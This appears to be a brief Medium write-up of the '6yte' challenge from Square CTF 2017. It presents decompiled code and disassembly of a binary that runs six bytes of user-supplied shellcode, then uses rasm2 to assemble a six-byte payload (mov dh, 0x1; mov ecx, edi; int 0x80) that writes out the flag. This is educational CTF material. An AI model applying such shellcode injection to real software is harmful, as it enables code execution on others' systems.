Square CTF writeup — 6yte

Cong Wang
Cong Wang
Oct 8, 2017 · 2 min read
    v5 = mmap(NULL, 6, 7, 33, -1, 0);
if (v2 == 0) {
// 0x8048889
printf("Shellcode location: %p\n", v5);
v4 = &v6;
printf("Flag location: %p\n", &v6);
sleep(1);
read_flag(v4);
g4 = v4;
g5 = 5;
g3 = 1;
g1 = 4;
((int32_t (*)())v5)();
return 0;
}
0x80488c9:   50                               push eax
0x80488ca: e8 1c fe ff ff call 0x80486eb <read_flag>
0x80488cf: 83 c4 10 add esp, 0x10
0x80488d2: 8d 85 68 ff ff ff lea eax, dword [ ebp + 0xffffff68 ]
0x80488d8: 89 c7 mov edi, eax
0x80488da: ba 05 00 00 00 mov edx, 0x5
0x80488df: bb 01 00 00 00 mov ebx, 0x1
0x80488e4: b8 04 00 00 00 mov eax, 0x4
0x80488e9: ff 65 e8 jmp dword [ ebp + 0xffffffe8 ]
% rasm2 'mov edx, 0x40; mov ecx, edi; int 0x80'
ba4000000089f9cd80
% rasm2 'mov dh, 0x1; mov ecx, edi; int 0x80'
b60189f9cd80

Cong Wang

Written by

Cong Wang

Linux kernel and security stuffs

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade